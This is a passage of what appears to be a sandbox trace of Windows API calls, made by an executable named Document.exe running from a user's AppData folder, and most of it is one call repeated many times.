0x1000d [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0165.770] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0165.771] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0165.771] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0165.771] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0165.771] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.771] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0165.771] GetDC (hWnd=0x0) returned 0x6401089b [0165.771] GetDeviceCaps (hdc=0x6401089b, index=90) returned 96 [0165.771] ReleaseDC (hWnd=0x0, hDC=0x6401089b) returned 1 [0165.771] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0165.771] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4564bc, dwData=0x1d6156c) returned 1 [0165.771] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0165.771] CreateFontIndirectA (lplf=0x18fe97) returned 0x810a08af [0165.771] GetObjectA (in: h=0x810a08af, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.772] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0165.772] CreateFontIndirectA (lplf=0x18fe1f) returned 0x2c0a06f4 [0165.772] GetObjectA (in: h=0x2c0a06f4, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.772] CreateFontIndirectA (lplf=0x18fde3) returned 0x400a078e [0165.772] GetObjectA (in: h=0x400a078e, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0165.772] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0xe02b7 [0165.775] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.775] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 1 [0165.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a0000 [0165.775] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0165.775] RegisterClassA (lpWndClass=0x45fe1c) returned 0xc5c1c0 [0165.775] GetSystemMetrics (nIndex=0) returned 1440 [0165.775] GetSystemMetrics (nIndex=1) returned 900 [0165.775] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Document", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30222 [0165.779] SetWindowLongA (hWnd=0x30222, nIndex=-4, dwNewLong=1708015) returned 4219680 [0165.779] SendMessageA (hWnd=0x30222, Msg=0x80, wParam=0x1, lParam=0xe02b7) returned 0x0 [0165.779] NtdllDefWindowProc_A (hWnd=0x30222, Msg=0x80, wParam=0x1, lParam=0xe02b7) returned 0x0 [0165.790] NtdllDefWindowProc_A (hWnd=0x30222, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1e02c5 [0165.791] SetClassLongA (hWnd=0x30222, nIndex=-14, dwNewLong=918199) returned 0x0 [0165.792] GetSystemMenu (hWnd=0x30222, bRevert=0) returned 0x40289 [0165.793] DeleteMenu (hMenu=0x40289, uPosition=0xf030, uFlags=0x0) returned 1 [0165.793] DeleteMenu (hMenu=0x40289, uPosition=0xf000, uFlags=0x0) returned 1 [0165.793] DeleteMenu (hMenu=0x40289, uPosition=0xf010, uFlags=0x0) returned 1 [0165.794] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0165.795] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0165.795] GetProcAddress (hModule=0x77820000, lpProcName="AnimateWindow") returned 0x7784b531 [0165.796] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75460000 [0165.796] GetProcAddress (hModule=0x75460000, lpProcName="InitializeFlatSB") returned 0x7549266f [0165.796] GetProcAddress (hModule=0x75460000, lpProcName="UninitializeFlatSB") returned 0x75492542 [0165.796] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollProp") returned 0x75491d29 [0165.796] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollProp") returned 0x7549238d [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_EnableScrollBar") returned 0x754920c9 [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_ShowScrollBar") returned 0x75491fdb [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollRange") returned 0x75491e8d [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollInfo") returned 0x75491f0f [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollPos") returned 0x75491ccd [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollPos") returned 0x7549216d [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollInfo") returned 0x754922be [0165.797] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollRange") returned 0x754921e2 [0165.797] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77820000 [0165.797] GetProcAddress (hModule=0x77820000, lpProcName="SetLayeredWindowAttributes") returned 0x7785ec88 [0165.797] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0165.797] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe2c, nSize=0xff | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.797] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] GetLastError () returned 0x6 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.798] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.799] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.800] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.801] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, 